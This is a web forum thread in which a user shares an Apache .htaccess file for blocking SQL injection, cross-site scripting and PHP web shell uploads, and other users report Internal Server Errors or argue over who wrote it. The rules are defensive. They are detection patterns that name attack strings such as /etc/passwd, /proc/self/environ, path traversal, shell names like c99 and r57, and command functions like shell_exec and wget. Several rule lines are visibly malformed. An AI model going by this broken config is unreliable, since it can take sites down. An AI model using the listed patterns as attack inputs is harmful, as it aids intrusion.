how to block sql injection and php shell uploaders using the htaccess file

Collapse
X
Collapse
 
  • Page of 3
  • Filter
  • Time
  • Show
Clear All
new posts
Previous 1 2 3 template Next
    #1

    how to block sql injection and php shell uploaders using the htaccess file

    as the topic sugests this is how to do it and it even blocks the lame huward script lol
    this is a good htaccess config file for noobs who have no idea on how to stop alot of these hacking techniques.

    PHP Code:
    RewriteEngine on
    Options     -Indexes

    Options     +FollowSymlinks
    RewriteRule     ^(.*)\.htm$ $1.php [nc]

    #php_value session.use_only_cookies 1
    #php_value session.use_trans_sid 0
    #php_flag register_globals off
    #php_flag allow_url_include 0
    #php_value upload_max_filesize 5M
    #php_value max_execution_time 200
    #php_value max_input_time 200
    #php_value post_max_size 40M
    #php_value session.use_trans_sid 1
    #php_value safe_mode_gid 1
    #php_value safe_mode_include_dir 1
    #php_value magic_quotes_runtime 0
    #php_value magic_quotes_sybase 0 
    #php_value allow_url_fopen 0
    #php_value arg_separator.output "&"

    Options +FollowSymlinks
    RewriteCond     %{QUERY_STRINGbase64_encode.*\(.*\) [OR]
    RewriteCond %{QUERY_STRINGhttp:.*\/.*\/ [OR]
    RewriteCond %{QUERY_STRING} ..*\/ [OR]
    RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
    RewriteCond %{QUERY_STRINGGLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
    RewriteCond %{QUERY_STRING_REQUEST(=|\[|\%[0-9A-Z]{0,2})
    RewriteCond %{QUERY_STRING} [^a-z](declare|char|set|cast|convert|delete|drop|exec|insert|meta|script|select|truncate|update)[^a-z] [NC]
    RewriteRule (.*) - [F]

    # Block out any script trying to set a mosConfig value through the URL

    RewriteCond %{QUERY_STRINGmosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]

    # Block out any script trying to base64_encode crap to send via URL

    RewriteCond %{QUERY_STRINGbase64_encode.*\(.*\) [OR]

    # Block out any script that includes a <script> tag in URL

    RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]

    # Block out any script trying to set a PHP GLOBALS variable via URL

    RewriteCond %{QUERY_STRINGGLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

    # Block out any script trying to modify a _REQUEST variable via URL

    RewriteCond %{QUERY_STRING_REQUEST(=|\[|\%[0-9A-Z]{0,2})

    # Send all blocked request to homepage with 403 Forbidden error!

    RewriteRule ^(.*)$ index.php [F,L]

    DirectoryIndex index.php

    SetEnv TZ Asia    /Manila
    AddDefaultCharset utf    -8
    DefaultLanguage en    -US
    LimitRequestBody 10240000

    <FilesMatch "\.(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$">
         Order Allow,Deny
     Deny from all
    </FilesMatch>

    <    ifmodule mod_php4.c>
         #php_value zlib.output_compression 16386
    </ifmodule>

    AddType image/gif                       .gif .GIF
    AddType image    /ief                       .ief
    AddType image    /jpeg                      .jpeg .jpg .jpe .JPG
    AddType image    /tiff                      .tiff .tifAuthName wapadik.net
    IndexIgnore     .htaccess */.??* *~ *# */HEADER* */README* */_vti*

    RewriteCond %{REQUEST_METHOD} (GET) [NC]
    RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)https(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)https%3a(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)http(%3A|:)(/|%2F){2}(.*)$ [NC]
    RewriteRule (.*) /huwad/blocker/blocker1.php   [L]

    RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
    RewriteCond %{QUERY_STRING} ^(.*)(%20SELECT%20|%20INSERT%20|CHAR\(|%20UPDATE%20|%20REPLACE%20)(.*)$ [NC]
    RewriteRule (.*) /huwad/blocker/blocker1.php   [L]

    RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
    RewriteCond %{QUERY_STRING} ^(.*)(%3C|<)/?script(.*)$ [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)(%3D|=)?javascript(%3A|:)(.*)$ [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)document\.location\.href(.*)$ [OR]

    RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)http%3a(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)ftp(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)ht%20tp(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)htt%20p(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)http%20(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)h%20ttp(%3A|:)(/|%2F){2}(.*)$ [NC,OR]

    RewriteCond %{QUERY_STRING} ^(.*)base64_encode(.*)$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)GLOBALS(=|[|%[0-9A-Z]{0,2})(.*)$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)_REQUEST(=|[|%[0-9A-Z]{0,2})(.*)$ [OR]
    RewriteCond %{REQUEST_URI} ^(.*)_vti(.*)$ [OR]
    RewriteCond %{REQUEST_URI} ^(.*)MSOffice(.*)$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)/etc/passwd(.*)$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)//(.*)$ [OR]
    RewriteCond %{REQUEST_URI} ^(.*)ShellAdresi.TXT(.*)$ [OR]
    RewriteCond %{REQUEST_URI} ^(.*)\[evil_root\]?(.*)$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)\.\./\.\./\.\./(.*)$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)/proc/self/environ(.*)$
    RewriteRule (.*) /huwad/blocker/blocker1.php   [L]

    RewriteCond %{HTTP_USER_AGENT} @nonymouse|ADSARobot|amzn_assoc|Anarchie|ASPSeek|Atomz|^[^?]*addresses\.com|AdvancedEmailExtractor|ah-ha|aktuelles|almaden|Art-Online|AspiWeb|ASSORT|ATHENS|attach|attache|autoemailspider|BackWeb|Bandit|BatchFTP|bdfetch|big.brother|BlackWidow|bmclient|BostonProject|Botmailto:craftbot@yahoo.com|BravoBrianSpiderEngineMarcoPolo|Buddy|Bullseye|bumblebee|capture|CherryPicker|ChinaClaw|CICC|clipping|CrescentInternetToolPack|cURL|Custo|cyberalert|Deweb|diagem|Digger|Digimarc|DIIbot|DirectUpdate|DISCo|DownloadAccelerator|DownloadDemon|DownloadWonder|Downloader|Drip|DSurf15a|DTS.Agent|EasyDL|eCatch|echo\ extense|ecollector|efp@gmx\.net|EirGrabber|EmailCollector|EmailExtractor|EmailSiphon|EmailWolf|ExpressWebPictures|ExtractorPro|EyeNetIE|fastlwspider|FavOrg|FavoritesSweeper|FetchAPIRequest|FEZhead|FileHound|FlashGet|FlickBot|fluffy|frontpage|GalaxyBot|Generic|Getleft|GetRight|GetSmart|GetWeb!|GetWebPage|gigabaz|Girafabot|Go!Zilla|Go-Ahead-Got-It|GornKer|Grabber|GrabNet|Grafula|GreenResearch|Harvest|hhjhj@yahoo|hloader|HMView|HomePageSearch|HTTPagent|HTTPConnect|httpdown|httpgeneric|HTTrack|^[^?]*iaea\.org|IBM_Planetwide|^[^?]*\.ideography\.co\.uk|ImageStripper|ImageSucker|imagefetch|IncyWincy|IndyLibrary|informant|Ingelin|InterGET|InternetNinja|InternetLinkAgent|InternetSeer\.com|Iria|Irvine|iOpus|IPiumBotlaurion(dot)com|Jakarta|JBH*Agent|JetCar|JustView|Kapere|KWebGet|Lachesis|larbin|LeechFTP|LexiBot|lftp|libwww|likse|Link*Sleuth|LINKSARoMATIZED|LinkWalker|LWP|lwp-trivial|Magnet|MacFinder|Mag-Net|MassDownloader|MemoWeb|MCspider|MicrosoftURLControl|MIDowntool|minibot\(NaverRobot\)|Mirror|MissiguaLocator|MisterPiX|MMMtoCrawl\/UrlDispatcherLLL|MSProxy|multithreaddb|nationaldirectory|Navroad|NearSite|NetAnts|NetCarta|netfactual|netcraft|NetMechanic|netprospector|NetResearchServer|NetSpider|NetVampire|NetZIP|NEWT|nicerspro|NPBot|Octopus|OfflineExplorer|OfflineNavigator|OpaL|Openfind|OpenTextSiteCrawler|OutWit|PackRat|PageGrabber|PapaFoto|pavuk|pcBrowser|PersonaPilot|PingALink|Pockey|ProgramShareware|psbot|PSurf|puf|Pump|PushSite|QRVA|QuepasaCreep|RealDownload|Reaper|Recorder|ReGet|replacer|RepoMonkey|Robozilla|Rover|RPT-HTTPClient|Rsync|SearchExpress|searchhippo|searchterms\.it|SecondStreetResearch|Shai|sitecheck|SiteMapper|SiteSnagger|SlySearch|SmartDownload|snagger|SpaceBison|Spegla|SpiderBot|SqWorm|StarDownloader|Stripper|Sucker|SuperBot|SuperHTTP|Surfbot|SurfWalker|Szukacz|tAkeOut|tarspider|TeleportPro|Telesoft|Templeton|traffixer|TrueRobot|TuringOS|TurnitinBot|TV33_Mercator|UIowaCrawler|URL_Spider_Pro|UtilMind|Vacuum|vagabondo|vayala|visibilitygap|vobsub|VoidEYE|vspider|w3mir|web\.by\.mail|WebDataExtractor|WebDownloader|WebImageCollector|WebSucker|WebAuto|webbandit|Webclipping|webcollector|webcollage|WebCopier|webcraft@bea|WebDAV|webdevil|webdownloader|Webdup|WebEmailExtractor|WebFetch|WebGoIS|WebHook|Webinator|WebLeacher|WebMiner|WebMirror|webmole|WebReaper|WebSauger|WEBsaver|WebsiteeXtractor|WebsiteQuester|WebSnake|Webster|WebStripper|websucker|webvac|webwalk|webweasel|WebWhacker|WebZIP|Wget|whizbang|WhosTalking|Widow|WISEbot|WUMPUS|Wweb|WWWOFFLE|Wysigot|XaldonWebSpider|XGET|x-Tractor|Zeus.* [OR]

    RewriteCond %{REQUEST_URI} .*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
    RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
    RewriteCond %{QUERY_STRING} ^(.*)=/home(.+)?/(.*)/(.*)$ [OR]
    RewriteCond %{QUERY_STRING} ^work_dir=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^command=.*&output.*$ [OR]
    RewriteCond %{QUERY_STRING} ^nts_[a-z0-9_]{0,10}=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^c=(t|setup|codes)$ [OR]
    RewriteCond %{QUERY_STRING} ^act=((about|cmd|selfremove|chbd|trojan|backc|massbrowsersploit|exploits|grablogins|upload.*)|((chmod|f)&f=.*))$ [OR]
    RewriteCond %{QUERY_STRING} ^act=(ls|search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|update|feedback|cmd|gofile|mkfile)&d=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^&?c=(l?v?i?&d=|v&fnot=|setup&ref=|l&r=|d&d=|tree&d|t&d=|e&d=|i&d=|codes|md5crack).*$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|mkdir|rmdir|pwd|clear|whoami|uname|tar|zip|unzip|tar|gzip|gunzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail|which|mkmode|touch|logname|edit_file|search_text|find_text|php_eval|download_file|ftp_file_down|ftp_file_up|ftp_brute|mail_file|mysql|mysql_dump|db_query)([^a-zA-Z0-9].+)*$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$
    #RewriteRule  (.*)  /huwad/blocker/blocker3.php  [L]

    <Files 403.shtml>
    order allow,deny
    allow from all
    </Files>

    deny from 203.177.42.214
    deny from 112.198.79.105 









    Dont Ask Me Dumb Questions.Or you'l get a Dumb Answer..
    Want A Profesional Logo or Theme For Your wap site Pm Me.If I Have The Time Ill Make It For Free

    Tags: None
    #2
    Where did you get this. very familiar .htaccess lol!
    com site: http://vampist.net
    download site: http://wapdloads.net
    fb: http://www.facebook.com/pmplx

    Comment

      #3
      secret lol









      Dont Ask Me Dumb Questions.Or you'l get a Dumb Answer..
      Want A Profesional Logo or Theme For Your wap site Pm Me.If I Have The Time Ill Make It For Free

      Comment

        #4
        wapadik.net ? lol

        Comment

          #5
          Nice share rampage, i guess this will work for newbies.

          Comment

            #6
            Internal Server Error . .


            thats wot i get .
            Wapchat4u


            Topsites4u

            Comment

              #7
              How to use that in hosting not support .htaccess?

              Comment

                #8
                wel its htaccess dnt use free host and nt wapadikt script lol









                Dont Ask Me Dumb Questions.Or you'l get a Dumb Answer..
                Want A Profesional Logo or Theme For Your wap site Pm Me.If I Have The Time Ill Make It For Free

                Comment

                  #9
                  Mis configuration@hadian

                  Comment

                    #10
                    will it work if add it in php.ini
                    ________________
                    Jacques
                    jacques@gw-designs.co.za
                    http://coding.biz.tm
                    Come join and lets make it a place to learn all the noobies how to code
                    __________________

                    NEVER FORGET TO CLICK THE TANX BUTTON IF U LIKE WHAT IM SHARING OR HELPING WITH

                    Comment

                      #11
                      May b not riderz bro.some methods make for only .htacess

                      Comment

                        #12
                        when i put it to my .htaccess, i got some like this:Internal Server Error

                        The server encountered an internal error or misconfiguration and was unable to complete your request.

                        Please contact the server administrator, webmaster@******.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

                        More information about this error may be available in the server error log.

                        Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
                        Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at ********.com Port 80

                        Comment

                          #13
                          Originally posted by jaidon20k View Post
                          when i put it to my .htaccess, i got some like this:Internal Server Error
                          Some host server not suitable for .htaccess code like that. Different config i guess.!

                          Comment

                            #14
                            who coded this? huwad or ozziemale31..
                            huwad called this as his site defender script.
                            Attached Files
                            Last edited by abipol; 03.10.10, 02:08.

                            Comment

                              #15
                              it was never got from that zip folder that i can assure u.. and not once did i say i coded the htaccess file
                              adding things to htaccess is not coding u ****. everything can be googled for it..if ppl like u rnt happy with what i share here then i simply wont help anyone code anything anymore..unlike u i am not a noob.this is why i stopped support for my mobilezonez script.ppl want want want and always critesize.but r 2 lazy to code their own ****.and huward didnt code this htaccess file u knobhead.









                              Dont Ask Me Dumb Questions.Or you'l get a Dumb Answer..
                              Want A Profesional Logo or Theme For Your wap site Pm Me.If I Have The Time Ill Make It For Free

                              Comment

                              Previous 1 2 3 template Next
                              Working...
                              X